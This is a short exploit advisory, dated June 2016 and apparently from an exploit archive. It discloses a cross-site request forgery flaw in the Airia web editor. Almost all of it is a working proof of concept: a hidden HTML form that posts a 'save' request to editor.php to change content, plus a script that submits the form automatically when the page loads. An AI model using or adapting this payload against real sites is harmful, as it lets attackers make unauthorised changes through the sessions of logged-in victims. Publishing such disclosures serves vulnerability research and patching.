Airia Cross Site Request Forgery
Posted on 21 June 2016
<!-- # Exploit Title: Airia - CSRF Vulnerability(Add content) # Date: 2016-06-20 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: http://ytyng.com # Software Link: https://github.com/ytyng/airia/archive/master.zip # Version: Latest commit # Tested on: Debian [wheezy] --> <form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST"> <input type="hidden" name="mode" value="save"> <input type="hidden" name="file" value="1"> <input type="hidden" name="scrollvalue" value=""> <input type="hidden" name="contents" value="CSRF Attack"> <input type="hidden" name="group" value="1"> <input type="submit" value="Replay!"> </form> <script type="text/javascript">document.forms.csrf_poc.submit();</script>